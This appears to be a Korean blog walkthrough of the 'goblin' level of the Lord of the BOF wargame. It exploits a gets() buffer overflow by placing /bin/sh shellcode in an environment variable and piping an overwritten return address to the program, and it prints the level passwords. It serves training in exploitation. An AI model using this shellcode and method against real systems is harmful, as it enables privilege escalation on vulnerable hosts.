3. cobolt → goblin

id : cobolt

pw : hacking exposed

이번 문제는 argv대신 stdin으로 입력값을 받습니다. 

argv를 이용할 수 없으니, '환경변수'를 이용해 보도록 할게요.

[cobolt@localhost cobolt]$ cat goblin.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - goblin
        - small buffer + stdin
*/

int main()
{
    char buffer[16];
    gets(buffer);
    printf("%s\n", buffer);
}

환경변수란?

환경변수는 OS가 필요한 정보를 메모리에 적재시켜 놓고 필요할 때마다 가져다 쓰는 영역을 의미합니다.

메모리 주소가 고정적이라, 원하는 코드를 넣어놓고 주소를 찾아 ret에 덮으면 해당 코드가 실행 되겠죠?

export SHELL=`python -c 'print "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

export 명령은 사용자 환경변수를 설정해 주는 명령어 입니다.

위 명령은 SHELL이라는 환경변수에 쉘코드를 저장해 줍니다.

[cobolt@localhost cobolt]$ export SHELL=`python -c 'print "\x90"*100 + "\x31\xc0
\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
[cobolt@localhost cobolt]$ env 
LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=
HISTSIZE=1000
HOSTNAME=localhost.localdomain
LOGNAME=cobolt
REMOTEHOST=192.168.30.1
MAIL=/var/spool/mail/cobolt
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/cobolt/bin
HOME=/home/cobolt
INPUTRC=/etc/inputrc
SHELL=1󿿐h//shh/bin⏓ᙰ
                    ̀ 
USER=cobolt
BASH_ENV=/home/cobolt/.bashrc
DISPLAY=192.168.30.1:0.0
LANG=en_US
OSTYPE=Linux
SHLVL=1

SHELL이라는 환경변수가 저장된 것이 보이시나요?

이제 SHELL의 고정메모리 주소를 알아내 봅시다.

c언어로 간단한 프로그램을 만들수 있습니다.

[cobolt@localhost cobolt]$ cat addr.c
#include 
int main(){
	printf("%p\n", getenv("SHELL"));
}
[cobolt@localhost cobolt]$ ./addr
0xbffffd49

저 주소(0xbffffd49)를 ret에 덮어주는 일만 남았네요.

이번 문제는 공격 코드가 기존과 약간 다른 형식으로 구성됩니다.

pipe를 이용하는 것 인데요, pipe( | )란, 프로세스간의 입력과 출력을 연결해 주는 역할로서,

pipe를 기준으로 앞쪽에 있는 프로세스의 표준 출력을 뒤쪽에 있는 프로세스의 표준 입력으로 연결합니다.

우리가 argv로 넣었던 python 코드를 파이프 앞쪽으로, goblin을 실행시키는 명령어를 뒤쪽으로 해주면 될 것 같습니다.

(python -c 'print "A"*20 + "환경변수의 주소"') | ./goblin

이렇게 해주면 왼쪽의 python구문의 결과가 goblin의 표준 입력으로 연결되게 됩니다.

하지만, 실제로 ret까지 덮은뒤에 실행 시켜보면 쉘코드가 실행되지 않는것을 볼 수 있는데요, 

그 이유는 shell이 python 으로부터 EOF("입력이 끝났습니다.")를 받아서 실행되자마자 끝나버리기 때문입니다.

shell이 실행되고도 계속 유지되기 위해선 EOF가 전달되지 않고 계속 입력을 받게 해주어야 합니다.

그리고 그 역할을 cat이 합니다.

(python -c 'print "A"*20 + "환경변수의 주소"'; cat) | ./goblin

이렇게 구성은 완료했습니다. A 20개를 넣는 이유는 이제 다 아시겠죠?

모르시겠다면 이전 포스트를 다시 한번 보고 와주세요^^

http://kortsec1n4mationm.tistory.com/3?category=1010394

그렇다면 아까 c언어로 코드를 만들어서 찾아낸 환경변수의 주솟값을 넣고 실행시켜 볼까요?

[cobolt@localhost cobolt]$ (python -c 'print "A"*20 + "\x49\xfd\xff\xbf"';cat) | ./goblin
AAAAAAAAAAAAAAAAAAAApþÿ¿
id
uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)
my-pass
euid = 503
hackers proof

성공적으로 shell이 따졌습니다~